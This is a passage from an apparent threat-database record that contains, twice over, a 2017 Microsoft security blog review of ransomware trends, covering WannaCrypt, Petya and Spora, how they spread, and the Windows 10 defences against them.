post, we demonstrated how we could better [protect from never-before-seen ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) with enhancements to the Windows Defender Antivirus cloud protection service.\n\n## The rise of global ransomware outbreaks\n\n[WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) (also known as WannaCry) is one of the most well-known new ransomware to surface so far this year. 
It emerged in May carrying an exploit for a patched vulnerability and quickly spread to out-of-date Windows 7 computers in Europe and later the rest of the world (the exploit did not affect Windows 10). The attack left several impacted organizations, high-tech facilities, and other services affected in its aftermath.\n\nOnly a few weeks after the WannaCrypt outbreak, a new variant of [Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) wreaked havoc in June. This Petya variant applied some of the propagation techniques used by WannaCrypt, but incorporated more methods to spread within a network. The outbreak started in Ukraine, where a compromised supply-chain delivered the ransomware through a software update process. The Petya infections swiftly spread to other countries in the course of a few hours. Petya\u2019s impact was not as widespread as the WannaCrypt outbreak; however, as our [in-depth analysis of Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) revealed, its upgrades made it so much more complex and caused more damage to organizations affected.\n\nWannaCrypt and Petya defied the trend of more targeted and localized attacks and became the first global malware attacks in quite a while. They generated worldwide mainstream interest. Interestingly, this attention might have added more challenges for attackers. For instance, the Bitcoin wallets used in these attacks were closely monitored by security researchers.\n\nWannaCrypt and Petya showed that ransomware attacks powered by sophisticated exploits on a global scale can be particularly catastrophic. 
Global attacks emphasize the need to [avert ransomware epidemics](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) by enabling responders to detect, respond to, and investigate attacks so infections can be contained and not allowed to swell. [Security patches](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) need to be applied as soon as they become available.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig3-ransomware-encounters-global-map.gif)\n\n_Figure 3. Global distribution of ransomware encounters by month, January-June 2017_\n\n## Increasing sophistication\n\nThe trend of global outbreaks is likely a result of more techniques incorporated by ransomware. WannaCrypt, Petya, Spora, and other new ransomware variants sported new capabilities that allowed them to spread faster and wreak more havoc than other malware.\n\n### Lateral movement using exploits\n\nSpora\u2019s aforementioned ability to spread via network drives and removable drives made it one of the most widespread ransomware. Though it was not the first ransomware family to integrate a worm-like spreading mechanism, it was able to use this capability to infect more computers.\n\nWith worm capabilities, ransomware attacks can have implications beyond endpoint security, introducing challenges to enterprise networks. This was particularly true for WannaCrypt, which spread by exploiting a vulnerability ([CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>), dubbed EternalBlue, previously patched in security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)), affecting networks with out-of-date computers.\n\nPetya expanded on WannaCrypt\u2019s spreading mechanism by exploiting not one, but two vulnerabilities. 
Apart from CVE-2017-0144, it also exploited [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (known as EternalRomance, and fixed in the same security update as EternalBlue), affecting out-of-date systems.\n\nThese two attacks highlighted the importance of applying security patches as they become available. They likewise highlight the importance of immediately detecting and stopping malicious behavior related to exploits.\n\nIt is important to note that the EternalBlue and EternalRomance exploits did not affect Windows 10, underscoring the benefits of upgrading to the latest, most secure version of platforms and software. Even if the exploits were designed to work on Windows 10, the platform has multiple [mitigations against exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), including [zero-days](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>). In addition, Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>)) [detects malicious activities resulting from exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/>) without the need for signature updates.\n\n### Credential theft\n\nOne of Petya\u2019s more noteworthy behaviors is its credential-stealing capability, which it does either by using a credential dumping tool or by stealing from the Credential Store. This capability poses a significant security challenge for networks with users who sign in with local admin privileges and have active sessions open across multiple machines. 
In this situation, stolen credentials can provide the same level of access the users have on other machines.\n\nThe Petya outbreak is a testament to the importance of credential hygiene. Enterprises need to constantly review privileged accounts, which have unhampered network access and access to corporate secrets and other critical data. [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) uses virtualization-based security to protect derived domain credentials and stop attempts to compromise privileged accounts.\n\n### Network scanning\n\nArmed with exploits or stolen credentials, ransomware can spread across networks through network scanning. For example, Petya scanned affected networks to establish valid connections to other computers. It then attempted to transfer copies of the malware using stolen credentials. Petya also scanned for network shares in an attempt to spread through those shares.\n\nWannaCrypt, on the other hand, ran massive scanning of IP addresses to look for computers that are vulnerable to the EternalBlue exploit. This gave it the ability to spread to out-of-date computers outside the network. Network defenders can uncover and stop unauthorized network scanning behaviors.\n\n### Destructive behavior\n\nIn most ransomware cases, the attacker motivation is clear: victims need to pay the ransom or never gain back access to encrypted files. While there is no guarantee that files are decrypted after payment is made, most ransomware infections make their intention clear through a ransom note. In August, WannaCrypt actors wrapped up their campaign by [withdrawing ransom paid in Bitcoins from online wallets](<http://www.bbc.com/news/technology-40811972>).\n\nPetya behaved like other ransomware in this aspect. Attackers [emptied the Petya online wallets](<https://www.theguardian.com/technology/2017/jul/05/notpetya-ransomware-hackers-ukraine-bitcoin-ransom-wallet-motives>) earlier in July. 
However, Petya had far more destructive routines: it overwrote or damaged the Master Boot Record (MBR) and Volume Boot Record (VBR), rendering affected computers unusable. This started a conversation about whether this Petya variant was primarily a ransomware like WannaCrypt or a destructive cyberattack like [Depriz](<https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/>) (also known as Shamoon).\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig4-petya-kill-chain.png)\n\n_Figure 4. Petya incorporated complex behaviors not typical of ransomware_\n\nThe debate is not settled, but the Petya attack does raise an important point\u2014attackers can easily incorporate other payloads into ransomware code to facilitate [targeted attacks](<https://krebsonsecurity.com/2016/09/ransomware-getting-more-targeted-expensive/>) and other types of destructive cyberattacks. As the threat of ransomware escalates, enterprises and individuals alike need a sound cybersecurity strategy and a protection suite that will defend against the end-to-end ransomware infection process.\n\n## Integrated end-to-end security suite against ransomware\n\nWith high-profile global outbreaks and other notable trends, the first six months of 2017 can be considered one of the more turbulent periods in the history of ransomware. The observations we summarized in this blog highlight the potency of the ransomware threat. Unfortunately, given the trends, we may see similarly sophisticated or even more complex attacks in the foreseeable future. More importantly, however, we should learn from these attacks and developments, because they highlight the areas of cybersecurity that need to be improved and reevaluated.\n\nAt Microsoft, we\u2019re always hard at work to continuously harden Windows 10 against ransomware and other attacks. 
In the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>), we will integrate Microsoft security solutions into a powerful single pane of glass\u2014centralized management that will allow customers to consume, manage, and integrate security for devices in the network. Windows Defender ATP will be expanded to include seamless integration across the entire Windows protection stack. The suite of tools will include the new Windows Defender Exploit Guard and Windows Defender Application Guard, as well as the enhanced Windows Defender Device Guard and Windows Defender AV.\n\nToday, Windows 10 Creators Update has [next-gen technologies that protect against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig5-Windows-10-end-to-end-protection-stack.png)\n\n_Figure 5. Windows 10 end-to-end protection stack (source: _[_Next-gen ransomware protection with Windows 10 Creators Update_](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)_)_\n\nWindows 10 has [multiple exploit mitigations](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>), including control flow guard for kernel (kCFG), kernel mode code integrity (KMCI), better kernel address space layout randomization (KASLR), NX HAL, and PAGE POOL (non-executable kernel regions). 
These mitigations help make [Windows 10 resilient](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>) to exploit attacks, such as those used by WannaCrypt and Petya.\n\n### Intelligent Security Graph and machine learning\n\nSecurity built into Windows 10 is powered by the Microsoft [Intelligent Security Graph](<https://t.co/UpWPG34Kwy>), which correlates signals from billions of sensors. Unique insights from this vast security intelligence enable Microsoft to deliver real-time protection through [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>), [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>), and other next-gen security technologies.\n\nThe increasing magnitude and complexity of ransomware require advanced real-time protection. [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>) uses precise [machine learning models](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved/>) as well as generic and heuristic techniques, improved detection of script-based ransomware, and enhanced behavior analysis to detect common and complex ransomware code. Using the cloud protection service, Windows Defender AV provides real-time protection. 
In recent enhancements, the [cloud protection service can make a swift assessment](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) of new and unknown files, allowing Windows Defender AV to block new malware the first time it is seen.\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) empowers SecOps personnel to [stop ransomware outbreaks](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) in the network. Both WannaCrypt and Petya showed how critical it is to detect, investigate, and respond to ransomware attacks and prevent the spread. Windows Defender ATP\u2019s enhanced behavioral and [machine learning detection libraries](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>) flag malicious behavior across the ransomware infection process. The new process tree visualization and improvements in machine isolation further help security operations to investigate and respond to ransomware attacks.\n\n### Online safety with Microsoft Edge and Office 365 Advanced Threat Protection\n\n[Microsoft Edge](<https://docs.microsoft.com/en-us/microsoft-edge/deploy/index>) can help block ransomware infections from the web by opening pages within app container boxes. It uses reputation-based blocking of downloads. Its click-to-run feature for Flash can stop ransomware infections that begin with exploit kits.\n\nTo defend against ransomware attacks that begin with email, [Microsoft Exchange Online Protection (EOP)](<https://products.office.com/en-us/exchange/exchange-email-security-spam-protection>) uses built-in anti-spam filtering capabilities that help protect Office 365 customers. 
[Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection>) helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. Outlook.com anti-spam filters also provide protection against malicious emails.\n\n### Virtualization-based security and application control\n\n[Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) can protect domain credentials from attacks like Petya, which attempted to steal credentials for use in lateral movement. Credential Guard uses virtualization-based security to protect against credential dumping.\n\nEnterprises can implement virtualization-based lockdown security, which can block all types of unauthorized content. [Windows Defender Device Guard](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies>) combines virtualization-based security and application control to allow only authorized apps to run. Petya, whose first infections were traced back to a compromised software update process, was blocked on devices with Device Guard enabled.\n\n### Microsoft-vetted security with Windows 10 S and more security features in Windows 10 Fall Creators Update\n\nDevices can achieve a similar lockdown security with [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>), which streamlines security and performance by working exclusively with apps from the Windows Store, ensuring that only apps that went through the Store onboarding, vetting, and signing process are allowed to run.\n\nAll of these security features make Windows 10 our most secure platform. 
Next-gen security technologies in Windows 10 provide next-gen protection against ransomware.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig6-Windows-10-next-gen-ransomware-protection.png)\n\n_Figure 6. Windows 10 next-gen security _\n\nBut the work to further harden Windows 10 against ransomware and other threats continues. Expect more security features and capabilities in the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>).\n\n \n\n**_Tanmay Ganacharya (_**[**@tanmayg**](<https://twitter.com/tanmayg>)**_)_**\n\n_Principal Group Manager, Windows Defender Research_\n\n#### \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>).\n\nFollow us on Twitter [@MMPC](<https://twitter.com/msftmmpc>) and Facebook [Microsoft Malware Protection Center](<https://www.facebook.com/msftmmpc/>)", "enchantments": {}, "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/", "id": "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "lastseen": "2017-09-06T16:03:51", "modified": "2017-09-06T14:58:36", "objectVersion": "1.4", "published": "2017-09-06T14:58:36", "references": [], "reporter": "msft-mmpc", "title": "Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene", "type": "mmpc", "viewCount": 27}, "differentElements": ["description"], "edition": 1, "lastseen": "2017-09-06T16:03:51"}, {"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "In the first six months of 2017, 
[ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) threats reached new levels of sophistication. The same period also saw the reversal of a [six-month downward trend](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>) in ransomware encounters. New ransomware code was released at a higher rate with increasing complexity. Two high-profile ransomware incidents brought cybersecurity to the forefront of mainstream conversations as the impact of attacks was felt around the world by organizations and individuals alike.\n\nThe recently released [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) summarizing movements in different areas of the threat landscape in the first quarter of the year showed the continued global presence of ransomware. The highest encounter rates, defined as the percentage of computers running Microsoft real-time security products that report blocking or detecting ransomware, were registered in the Czech Republic, Korea, and Italy from January to March 2017.\n\nSustained ransomware campaigns and high-profile attacks continued to highlight the need for advanced comprehensive cybersecurity strategy. In this blog entry, we share our key observations on the ransomware landscape and offer insights on what can be learned from trends and developments so far in 2017.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig3-ransomware-encounters-global-map.gif)\n\n_Figure 1. Global distribution of ransomware encounters by month, January-June 2017_\n\n## Ransomware growth rallies\n\nIn March of 2017, the volume of ransomware encounters started to pick up again after several months of decline. 
The growth is driven to a certain extent by sustained activities from established ransomware operations like [Cerber](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Cerber>), with an onslaught of attacks powered by [ransomware-as-a-service](<https://www.microsoft.com/en-us/wdsi/help/antimalware-security-glossary#ransomware-as-a-service>).\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig1-monthly-ransomware-encounters.png)\n\n_Figure 2. Total ransomware encounters by month, July 2016-June 2017 (source: _[_Ransomware FAQ page_](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>)_)_\n\nIn part, this surge is also driven by the emergence of new ransomware families, which are being released into the wild at a faster rate. In the first half of 2017, we discovered 71 new ransomware families, an increase from the 64 new families we found in the same period in 2016.\n\nSome of these new ransomware families stand out because they exhibit new behaviors that make them more complex. For instance, the latest [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) shows that in March 2017, two-month old [Spora](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Spora.A>) overtook Cerber as the most prevalent ransomware family.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig2-trends-ransomware-families.png)\n\n_Figure 3. Trends for several commonly encountered ransomware families in 1Q17, by month (source: _[_Microsoft Security Intelligence Report 22_](<https://www.microsoft.com/en-us/security/intelligence-report>)_)_\n\nSpora\u2019s quick rise to the top may be traced to its capability to spread via network drives and removable drives, such as USB sticks. 
Initial versions targeted Russia and featured a ransom note in the local language. It has since gone global, spreading to other countries with a ransom note in English.\n\nOther notable new ransomware families in 2017 include [Jaffrans](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Jaffrans>), [Exmas](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Exmas>), and [Ergop](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Ergop.A>). While these families have not quite achieved the prevalence of Spora, they show signs of persistence and periodic improvements that are observed in older, successful families.\n\nMicrosoft protects customers from new and emerging ransomware like Spora using a combination of advanced heuristics, generics, and machine learning, which work together to deliver predictive, real-time protection. In a recent blog post, we demonstrated how we could better [protect from never-before-seen ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) with enhancements to the Windows Defender Antivirus cloud protection service.\n\n## The rise of global ransomware outbreaks\n\n[WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) (also known as WannaCry) is one of the most well-known new ransomware to surface so far this year. It emerged in May carrying an exploit for a patched vulnerability and quickly spread to out-of-date Windows 7 computers in Europe and later the rest of the world (the exploit did not affect Windows 10). 
The attack left several impacted organizations, high-tech facilities, and other services affected in its aftermath.\n\nOnly a few weeks after the WannaCrypt outbreak, a new variant of [Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) wreaked havoc in June. This Petya variant applied some of the propagation techniques used by WannaCrypt, but incorporated more methods to spread within a network. The outbreak started in Ukraine, where a compromised supply-chain delivered the ransomware through a software update process. The Petya infections swiftly spread to other countries in the course of a few hours. Petya\u2019s impact was not as widespread as the WannaCrypt outbreak; however, as our [in-depth analysis of Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) revealed, its upgrades made it so much more complex and caused more damage to organizations affected.\n\nWannaCrypt and Petya defied the trend of more targeted and localized attacks and became the first global malware attacks in quite a while. They generated worldwide mainstream interest. Interestingly, this attention might have added more challenges for attackers. For instance, the Bitcoin wallets used in these attacks were closely monitored by security researchers.\n\nWannaCrypt and Petya showed that ransomware attacks powered by sophisticated exploits on a global scale can be particularly catastrophic. Global attacks emphasize the need to [avert ransomware epidemics](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) by enabling responders to detect, respond to, and investigate attacks so infections can be contained and not allowed to swell. 
[Security patches](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) need to be applied as soon as they become available.\n\n## Increasing sophistication\n\nThe trend of global outbreaks is likely a result of more techniques incorporated by ransomware. WannaCrypt, Petya, Spora, and other new ransomware variants sported new capabilities that allowed them to spread faster and wreak more havoc than other malware.\n\n### Lateral movement using exploits\n\nSpora\u2019s aforementioned ability to spread via network drives and removable drives made it one of the most widespread ransomware. Though it was not the first ransomware family to integrate a worm-like spreading mechanism, it was able to use this capability to infect more computers.\n\nWith worm capabilities, ransomware attacks can have implications beyond endpoint security, introducing challenges to enterprise networks. This was particularly true for WannaCrypt, which spread by exploiting a vulnerability ([CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>), dubbed EternalBlue, previously patched in security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)), affecting networks with out-of-date computers.\n\nPetya expanded on WannaCrypt\u2019s spreading mechanism by exploiting not one, but two vulnerabilities. Apart from CVE-2017-0144, it also exploited [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (known as EternalRomance, and fixed in the same security update as EternalBlue), affecting out-of-date systems.\n\nThese two attacks highlighted the importance of applying security patches as they become available. 
They likewise highlight the importance of immediately detecting and stopping malicious behavior related to exploits.\n\nIt is important to note that the EternalBlue and EternalRomance exploits did not affect Windows 10, underscoring the benefits of upgrading to the latest, most secure version of platforms and software. Even if the exploits were designed to work on Windows 10, the platform has multiple [mitigations against exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), including [zero-days](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>). In addition, Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>)) [detects malicious activities resulting from exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/>) without the need for signature updates.\n\n### Credential theft\n\nOne of Petya\u2019s more noteworthy behaviors is its credential-stealing capability, which it does either by using a credential dumping tool or by stealing from the Credential Store. This capability poses a significant security challenge for networks with users who sign in with local admin privileges and have active sessions open across multiple machines. In this situation, stolen credentials can provide the same level of access the users have on other machines.\n\nThe Petya outbreak is testament to the importance of credential hygiene. Enterprises need to constantly review privileged accounts, which have unhampered network access and access to corporate secrets and other critical data. 
[Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) uses virtualization-based security to protect derived domain credentials and stop attempts to compromise privileged accounts.\n\n### Network scanning\n\nArmed with exploits or stolen credentials, ransomware can spread across networks through network scanning. For example, Petya scanned affected networks to establish valid connections to other computers. It then attempted to transfer copies of the malware using stolen credentials. Petya also scanned for network shares in an attempt to spread through those shares.\n\nWannaCrypt, on the other hand, ran massive scanning of IP addresses to look for computers that are vulnerable to the EternalBlue exploit. This gave it the ability to spread to out-of-date computers outside the network. Network defenders can uncover and stop unauthorized network scanning behaviors.\n\n### Destructive behavior\n\nIn most ransomware cases, the attacker motivation is clear: victims need to pay the ransom or never gain back access to encrypted files. While there is no guarantee that files are decrypted after payment is made, most ransomware infections make their intention clear through a ransom note. In August, WannaCrypt actors wrapped up their campaign by [withdrawing ransom paid in Bitcoins from online wallets](<http://www.bbc.com/news/technology-40811972>).\n\nPetya behaved like other ransomware in this aspect. Attackers [emptied the Petya online wallets](<https://www.theguardian.com/technology/2017/jul/05/notpetya-ransomware-hackers-ukraine-bitcoin-ransom-wallet-motives>) earlier in July. However, Petya had far more destructive routines: it overwrote or damaged the Master Boot Record (MBR) and Volume Boot Record (VBR), rendering affected computers unusable. 
This started a conversation about whether this Petya variant was primarily a ransomware like WannaCrypt or a destructive cyberattack like [Depriz](<https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/>) (also known as Shamoon).\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig4-petya-kill-chain.png)\n\n_Figure 4. Petya incorporated complex behaviors not typical of ransomware_\n\nThe debate is not settled, but the Petya attack does raise an important point\u2014attackers can easily incorporate other payloads into ransomware code to facilitate [targeted attacks](<https://krebsonsecurity.com/2016/09/ransomware-getting-more-targeted-expensive/>) and other types of destructive cyberattacks. As the threat of ransomware escalates, enterprises and individuals alike need a sound cybersecurity strategy and a protection suite that will defend against the end-to-end ransomware infection process.\n\n## Integrated end-to-end security suite against ransomware\n\nWith high-profile global outbreaks and other notable trends, the first six months of 2017 can be considered one of the more turbulent periods in the history of ransomware. The observations we summarized in this blog highlight the potency of the ransomware threat. Unfortunately, given the trends, we may see similarly sophisticated or even more complex attacks in the foreseeable future. More importantly, however, we should learn from these attacks and developments, because they highlight the areas of cybersecurity that need to be improved and reevaluated.\n\nAt Microsoft, we\u2019re always hard at work to continuously harden Windows 10 against ransomware and other attacks. 
In the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>), we will integrate Microsoft security solutions into a powerful single pane of glass\u2014centralized management that will allow customers to consume, manage, and integrate security for devices in the network. Windows Defender ATP will be expanded to include seamless integration across the entire Windows protection stack. The suite of tools will include the new Windows Defender Exploit Guard and Windows Defender Application Guard, as well as the enhanced Windows Defender Device Guard and Windows Defender AV.\n\nToday, Windows 10 Creators Update has [next-gen technologies that protect against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\n![](https://msdnshared.blob.core.windows.net/media/2017/08/ransomware-1h-2017-review-fig5-Windows-10-end-to-end-protection-stack.png)\n\n_Figure 5. Windows 10 end-to-end protection stack (source: _[_Next-gen ransomware protection with Windows 10 Creators Update_](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)_)_\n\nWindows 10 has [multiple exploit mitigations](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>), including control flow guard for kernel (kCFG), kernel mode code integrity (KMCI), better kernel address space layout randomization (KASLR), NX HAL, and PAGE POOL (non-executable kernel regions). 
These mitigations help make [Windows 10 resilient](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>) to exploit attacks, such as those used by WannaCrypt and Petya.\n\n### Intelligent Security Graph and machine learning\n\nSecurity built into Windows 10 is powered by the Microsoft [Intelligent Security Graph](<https://t.co/UpWPG34Kwy>), which correlates signals from billions of sensors. Unique insights from this vast security intelligence enable Microsoft to deliver real-time protection through [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>), [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>), and other next-gen security technologies.\n\nThe increasing magnitude and complexity of ransomware require advanced real-time protection. [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>) uses precise [machine learning models](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved/>) as well as generic and heuristic techniques, improved detection of script-based ransomware, and enhanced behavior analysis to detect common and complex ransomware code. Using the cloud protection service, Windows Defender AV provides real-time protection. 
In recent enhancements, the [cloud protection service can make a swift assessment](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) of new and unknown files, allowing Windows Defender AV to block new malware the first time it is seen.\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) empowers SecOps personnel to [stop ransomware outbreaks](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) in the network. Both WannaCrypt and Petya showed how critical it is to detect, investigate, and respond to ransomware attacks and prevent the spread. Windows Defender ATP\u2019s enhanced behavioral and [machine learning detection libraries](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>) flag malicious behavior across the ransomware infection process. The new process tree visualization and improvements in machine isolation further help security operations to investigate and respond to ransomware attacks.\n\n### Online safety with Microsoft Edge and Office 365 Advanced Threat Protection\n\n[Microsoft Edge](<https://docs.microsoft.com/en-us/microsoft-edge/deploy/index>) can help block ransomware infections from the web by opening pages within app container boxes. It uses reputation-based blocking of downloads. Its click-to-run feature for Flash can stop ransomware infections that begin with exploit kits.\n\nTo defend against ransomware attacks that begin with email, [Microsoft Exchange Online Protection (EOP)](<https://products.office.com/en-us/exchange/exchange-email-security-spam-protection>) uses built-in anti-spam filtering capabilities that help protect Office 365 customers. 
[Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection>) helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. Outlook.com anti-spam filters also provide protection against malicious emails.\n\n### Virtualization-based security and application control\n\n[Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) can protect domain credentials from attacks like Petya, which attempted to steal credentials for use in lateral movement. Credential Guard uses virtualization-based security to protect against credential dumping.\n\nEnterprises can implement virtualization-based lockdown security, which can block all types of unauthorized content. [Windows Defender Device Guard](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies>) combines virtualization-based security and application control to allow only authorized apps to run. Petya, whose first infections were traced back to a compromised software update process, was blocked on devices with Device Guard enabled.\n\n### Microsoft-vetted security with Windows 10 S and more security features in Windows 10 Fall Creators Update\n\nDevices can achieve a similar lockdown security with [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>), which streamlines security and performance by working exclusively with apps from the Windows Store, ensuring that only apps that went through the Store onboarding, vetting, and signing process are allowed to run.\n\nAll of these security features make Windows 10 our most secure platform. 
